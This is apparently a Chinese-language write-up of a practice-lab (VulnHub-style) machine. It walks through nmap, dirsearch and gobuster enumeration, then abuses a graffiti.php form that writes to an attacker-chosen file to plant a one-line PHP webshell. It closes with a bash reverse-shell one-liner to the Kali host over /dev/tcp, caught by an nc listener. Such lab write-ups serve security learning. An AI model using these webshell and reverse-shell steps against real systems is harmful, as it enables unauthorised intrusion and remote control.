1、安装靶机和kali,并设置为net模式,保证在同一网段下
2、kali扫描靶机
nmap 192.168.19.1/24
3、浏览器访问靶场
4、扫出敏感目录
dirsearch -u "http://192.168.19.162"
访问一下这两个可以访问的目录
robots.txt告诉我们这里没有,看看下一个
javascript里也是什么都没有
5、扫描文件
gobuster dir -u http://192.168.19.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
扫到几个文件,去访问一下
在graffiti.txt里看到了一些可能有用的信息
在graffiti.php里看到了一个输入框
我们随便输入点东西,看看是什么反应
发现输进去的东西会在页面显示出来,试一下sql注入看看
还是输出到了页面上,并不会被数据库执行
那我们抓包看一下他的包是怎么上传的
包里看到了我们输入一个1,上传到了graffiti.txt文件,我们再去访问一下刚刚的txt文件
发现这里有我们刚刚尝试输入的很多信息,说明我们上传的数值可以被传到file后的文件里,那么我们可以改包,新建一个php文件,把一句话木马写进去
放行,访问文件看看有没有上传成功
访问了我们的木马文件,没有报错,那去蚁剑测试一下连接
可以看到木马已经成功被我们上传到这个网站里,那接下来就可以反弹shell
在蚁剑的虚拟终端里写入反弹代码/bin/bash -c 'bash -i >& /dev/tcp/192.168.19.133/6666 0>&1'这里的IP是kali的IP,大家可千万不要写成靶机的IP
在kali里开启nc监听
成功
